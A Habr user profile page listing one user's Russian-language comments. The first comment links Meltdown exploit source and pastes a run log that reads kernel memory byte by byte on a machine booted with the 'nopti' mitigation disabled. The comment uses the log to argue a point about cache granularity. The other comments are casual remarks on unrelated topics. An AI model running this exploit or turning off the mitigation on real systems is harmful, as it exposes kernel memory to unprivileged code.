Как стать автором
Обновить
-9
0

Пользователь

Отправить сообщение
Дружище, если ты такой умный, то постарайся объяснить, почему Meltdown неплохо работает и с 256-байтными кусками, тогда как TLB кеш оперирует как минимум 4096-байтными.

Исходный код Meltdown:
pastebin.com/juzJ0Y1E

Лог:
usr@lnx:~/meltdown-exploit-master$ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-4.9.0-5-amd64 root=UUID=acbffb90-bf4d-46d1-ad1f-ecfde3523f8b ro quiet nopti

usr@lnx:~/meltdown-exploit-master$ ./run.sh
looking for linux_proc_banner in /proc/kallsyms
TARGET_SIZE = 256
VARIANTS_READ = 256
cached = 47, uncached = 194, threshold 95

addr ffffffff8c400060 hist[00] = 9
addr ffffffff8c400060 hist[0b] = 3
addr ffffffff8c400060 hist[1b] = 3
addr ffffffff8c400060 hist[25] = 1884
addr ffffffff8c400060 hist[26] = 1839
addr ffffffff8c400060 hist[2b] = 1
addr ffffffff8c400060 hist[4b] = 1
addr ffffffff8c400060 hist[bb] = 4
addr ffffffff8c400060 hist[e4] = 1
addr ffffffff8c400060 hist[eb] = 1
addr ffffffff8c400060 hist[fb] = 39
read ffffffff8c400060 = 25 %

addr ffffffff8c400061 hist[00] = 13
addr ffffffff8c400061 hist[01] = 2
addr ffffffff8c400061 hist[05] = 3
addr ffffffff8c400061 hist[1b] = 1
addr ffffffff8c400061 hist[2b] = 1
addr ffffffff8c400061 hist[73] = 1857
addr ffffffff8c400061 hist[74] = 1801
addr ffffffff8c400061 hist[8b] = 3
addr ffffffff8c400061 hist[ad] = 1
addr ffffffff8c400061 hist[bb] = 3
addr ffffffff8c400061 hist[db] = 3
addr ffffffff8c400061 hist[eb] = 2
addr ffffffff8c400061 hist[fb] = 51
read ffffffff8c400061 = 73 s

addr ffffffff8c400062 hist[00] = 11
addr ffffffff8c400062 hist[01] = 4
addr ffffffff8c400062 hist[03] = 1
addr ffffffff8c400062 hist[05] = 1
addr ffffffff8c400062 hist[0b] = 1
addr ffffffff8c400062 hist[1b] = 1
addr ffffffff8c400062 hist[20] = 1798
addr ffffffff8c400062 hist[24] = 1769
addr ffffffff8c400062 hist[2b] = 2
addr ffffffff8c400062 hist[3b] = 2
addr ffffffff8c400062 hist[7b] = 1
addr ffffffff8c400062 hist[8b] = 1
addr ffffffff8c400062 hist[9b] = 1
addr ffffffff8c400062 hist[bb] = 1
addr ffffffff8c400062 hist[fb] = 42
read ffffffff8c400062 = 20

addr ffffffff8c400063 hist[00] = 10
addr ffffffff8c400063 hist[01] = 1
addr ffffffff8c400063 hist[02] = 1
addr ffffffff8c400063 hist[0b] = 2
addr ffffffff8c400063 hist[1b] = 2
addr ffffffff8c400063 hist[70] = 15
addr ffffffff8c400063 hist[71] = 15
addr ffffffff8c400063 hist[76] = 1636
addr ffffffff8c400063 hist[77] = 1579
addr ffffffff8c400063 hist[78] = 1578
addr ffffffff8c400063 hist[7b] = 1
addr ffffffff8c400063 hist[8b] = 1
addr ffffffff8c400063 hist[9b] = 1
addr ffffffff8c400063 hist[ab] = 1
addr ffffffff8c400063 hist[bb] = 3
addr ffffffff8c400063 hist[db] = 2
addr ffffffff8c400063 hist[fb] = 47
read ffffffff8c400063 = 76 v

addr ffffffff8c400064 hist[00] = 32
addr ffffffff8c400064 hist[01] = 4
addr ffffffff8c400064 hist[04] = 1
addr ffffffff8c400064 hist[07] = 1
addr ffffffff8c400064 hist[1b] = 3
addr ffffffff8c400064 hist[2b] = 4
addr ffffffff8c400064 hist[4b] = 1
addr ffffffff8c400064 hist[65] = 1300
addr ffffffff8c400064 hist[67] = 1228
addr ffffffff8c400064 hist[6b] = 2
addr ffffffff8c400064 hist[7b] = 1
addr ffffffff8c400064 hist[8b] = 2
addr ffffffff8c400064 hist[ab] = 3
addr ffffffff8c400064 hist[bb] = 2
addr ffffffff8c400064 hist[eb] = 1
addr ffffffff8c400064 hist[fb] = 58
read ffffffff8c400064 = 65 e

addr ffffffff8c400065 hist[00] = 8
addr ffffffff8c400065 hist[01] = 2
addr ffffffff8c400065 hist[02] = 2
addr ffffffff8c400065 hist[03] = 16
addr ffffffff8c400065 hist[04] = 1
addr ffffffff8c400065 hist[3b] = 2
addr ffffffff8c400065 hist[47] = 1
addr ffffffff8c400065 hist[4b] = 1
addr ffffffff8c400065 hist[72] = 1706
addr ffffffff8c400065 hist[7b] = 3
addr ffffffff8c400065 hist[ab] = 1
addr ffffffff8c400065 hist[bb] = 1
addr ffffffff8c400065 hist[fb] = 52
read ffffffff8c400065 = 72 r

addr ffffffff8c400066 hist[00] = 9
addr ffffffff8c400066 hist[01] = 2
addr ffffffff8c400066 hist[02] = 1
addr ffffffff8c400066 hist[0b] = 1
addr ffffffff8c400066 hist[73] = 1876
addr ffffffff8c400066 hist[74] = 1852
addr ffffffff8c400066 hist[7b] = 1
addr ffffffff8c400066 hist[bb] = 1
addr ffffffff8c400066 hist[eb] = 1
addr ffffffff8c400066 hist[fb] = 39
read ffffffff8c400066 = 73 s

addr ffffffff8c400067 hist[00] = 6
addr ffffffff8c400067 hist[05] = 1
addr ffffffff8c400067 hist[3b] = 1
addr ffffffff8c400067 hist[69] = 1319
addr ffffffff8c400067 hist[bb] = 1
addr ffffffff8c400067 hist[d9] = 1
addr ffffffff8c400067 hist[db] = 1
addr ffffffff8c400067 hist[fb] = 60
read ffffffff8c400067 = 69 i

addr ffffffff8c400068 hist[00] = 1
addr ffffffff8c400068 hist[01] = 1
addr ffffffff8c400068 hist[03] = 5
addr ffffffff8c400068 hist[04] = 1
addr ffffffff8c400068 hist[05] = 1
addr ffffffff8c400068 hist[6f] = 1373
addr ffffffff8c400068 hist[72] = 1352
addr ffffffff8c400068 hist[7b] = 1
addr ffffffff8c400068 hist[fb] = 46
read ffffffff8c400068 = 6f o

addr ffffffff8c400069 hist[00] = 5
addr ffffffff8c400069 hist[01] = 1
addr ffffffff8c400069 hist[03] = 3
addr ffffffff8c400069 hist[6b] = 1
addr ffffffff8c400069 hist[6e] = 1007
addr ffffffff8c400069 hist[72] = 991
addr ffffffff8c400069 hist[8b] = 2
addr ffffffff8c400069 hist[9b] = 1
addr ffffffff8c400069 hist[bb] = 1
addr ffffffff8c400069 hist[eb] = 1
addr ffffffff8c400069 hist[fb] = 44
read ffffffff8c400069 = 6e n

addr ffffffff8c40006a hist[00] = 3
addr ffffffff8c40006a hist[01] = 3
addr ffffffff8c40006a hist[1b] = 1
addr ffffffff8c40006a hist[20] = 1896
addr ffffffff8c40006a hist[24] = 1880
addr ffffffff8c40006a hist[2b] = 1
addr ffffffff8c40006a hist[4b] = 1
addr ffffffff8c40006a hist[8b] = 1
addr ffffffff8c40006a hist[ab] = 1
addr ffffffff8c40006a hist[bb] = 1
addr ffffffff8c40006a hist[eb] = 1
addr ffffffff8c40006a hist[fb] = 47
read ffffffff8c40006a = 20

addr ffffffff8c40006b hist[00] = 9
addr ffffffff8c40006b hist[1b] = 6
addr ffffffff8c40006b hist[25] = 1629
addr ffffffff8c40006b hist[26] = 1573
addr ffffffff8c40006b hist[2b] = 1
addr ffffffff8c40006b hist[39] = 1
addr ffffffff8c40006b hist[3b] = 1
addr ffffffff8c40006b hist[4b] = 1
addr ffffffff8c40006b hist[6b] = 1
addr ffffffff8c40006b hist[7b] = 3
addr ffffffff8c40006b hist[ab] = 3
addr ffffffff8c40006b hist[bb] = 2
addr ffffffff8c40006b hist[db] = 4
addr ffffffff8c40006b hist[fb] = 65
read ffffffff8c40006b = 25 %

addr ffffffff8c40006c hist[00] = 6
addr ffffffff8c40006c hist[01] = 3
addr ffffffff8c40006c hist[05] = 1
addr ffffffff8c40006c hist[1b] = 1
addr ffffffff8c40006c hist[3b] = 1
addr ffffffff8c40006c hist[4b] = 2
addr ffffffff8c40006c hist[6b] = 4
addr ffffffff8c40006c hist[73] = 1892
addr ffffffff8c40006c hist[74] = 1838
addr ffffffff8c40006c hist[7b] = 1
addr ffffffff8c40006c hist[8b] = 3
addr ffffffff8c40006c hist[ab] = 2
addr ffffffff8c40006c hist[db] = 2
addr ffffffff8c40006c hist[fb] = 59
read ffffffff8c40006c = 73 s

addr ffffffff8c40006d hist[00] = 6
addr ffffffff8c40006d hist[01] = 2
addr ffffffff8c40006d hist[1b] = 1
addr ffffffff8c40006d hist[20] = 1799
addr ffffffff8c40006d hist[24] = 1784
addr ffffffff8c40006d hist[4b] = 1
addr ffffffff8c40006d hist[db] = 1
addr ffffffff8c40006d hist[fb] = 42
read ffffffff8c40006d = 20

addr ffffffff8c40006e hist[00] = 15
addr ffffffff8c40006e hist[01] = 1
addr ffffffff8c40006e hist[02] = 2
addr ffffffff8c40006e hist[03] = 2
addr ffffffff8c40006e hist[05] = 2
addr ffffffff8c40006e hist[1b] = 1
addr ffffffff8c40006e hist[28] = 1062
addr ffffffff8c40006e hist[29] = 1023
addr ffffffff8c40006e hist[3b] = 1
addr ffffffff8c40006e hist[4b] = 2
addr ffffffff8c40006e hist[5c] = 1
addr ffffffff8c40006e hist[6b] = 1
addr ffffffff8c40006e hist[8b] = 1
addr ffffffff8c40006e hist[9b] = 3
addr ffffffff8c40006e hist[ab] = 1
addr ffffffff8c40006e hist[db] = 1
addr ffffffff8c40006e hist[eb] = 1
addr ffffffff8c40006e hist[fb] = 62
read ffffffff8c40006e = 28 (

addr ffffffff8c40006f hist[00] = 1
addr ffffffff8c40006f hist[01] = 2
addr ffffffff8c40006f hist[02] = 2
addr ffffffff8c40006f hist[03] = 2
addr ffffffff8c40006f hist[06] = 1
addr ffffffff8c40006f hist[0b] = 1
addr ffffffff8c40006f hist[2b] = 2
addr ffffffff8c40006f hist[3b] = 1
addr ffffffff8c40006f hist[64] = 1630
addr ffffffff8c40006f hist[67] = 1621
addr ffffffff8c40006f hist[ab] = 4
addr ffffffff8c40006f hist[fb] = 53
read ffffffff8c40006f = 64 d
VULNERABLE
VULNERABLE ON
4.9.0-5-amd64 #1 SMP Debian 4.9.65-3+deb9u2 (2018-01-04) unknown
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 42
model name : Intel(R) Core(TM) i5-2410M CPU @ 2.30GHz
stepping : 7
microcode : 0x17
cpu MHz : 2399.951
cache size : 3072 KB
physical id : 0

Я сам регулярно использую reflection, но вот это ваше все - просто next level :)

Олимпиада в дистанционном формате?

Интересно, как контролировали?

Можно я тут рядом постою?

Ну я вполне могу себе представить, сколько времени занимают все эти невинные хобби.
И сколько может заработать нормальный программист, устроившись работать на дядю за бабло.

Скорее мой комментарий написан с точки зрения продавца, а не покупателя :)

Интересно, а куда можно устроиться с резюме типа как у него?

Нда, $20k в данном случае - это ниочем.
Потраченное время намного дороже.
Другое дело, что человек наверное готовит себе резюме.

С одной стороны да.

С другой стороны, естественные возможности для развития быстро насытятся.

Поэтому это никак не оправдывает задротить в игры сутками :)

В игры полезно поиграть для формирования определенных навыков (например, следить за большим числом объектов и не терять главное). Но не более того.

Я вот не могу играть в некоторые динамичные игры. Быстро теряю концентраци и устаю.

А я в универе придумал самодельный нигилизм.
Сейчас могу шокировать неподготовленных окружающих офигительными взглядами на жизнь.
Из диагнозов только разве что алкоголизм, но и тот сам прошел.

А есть надеждные "мультибренд" сервисы для IoT, которые обещают никогда-никогда не закрываться?

Типа бизнес купил подписку на 10-20-30 лет, подключил свои девайсы и радуется жизни.

У сервиса трафик небольшой, свое SDK для надежного подключения и end-to-end шифрования.

Или нафик это надо? Проще тупо кидануть людей и закрыться.

Интересно, как персистентность сочетается с необходимостью в периодическом сбросе состояния системы (перезагрузке и т.д.)

Спасибо за интересные идеи. Фрейди и Юнга можно было и не упоминать.

Интересно, а вот как юридически обеспечивается работа загрузчика PE-файлов?

Он ведь модифицирует комьютерную информацию, да еще и защищенную копирайтом.

Дырявый сишный код... мммм loving it.

Практика показывает, что когда один говорит "намного сложнее", кто-то другой, должным образом мотивированный, просто берет и делает.

За скальпы :)

А что у вас в UK-шечке прямо тоже проблемы с этим?

Белорусские "колхозники" - являются колзозниками IRL, это млять не метафора, если чо.

Это уже нифига не смешно.
В Ubuntu, например, оболочка содержит какую-то логику на JavaScript и регулярно кидается в меня экспешенами.

Информация

В рейтинге
Не участвует
Зарегистрирован
Активность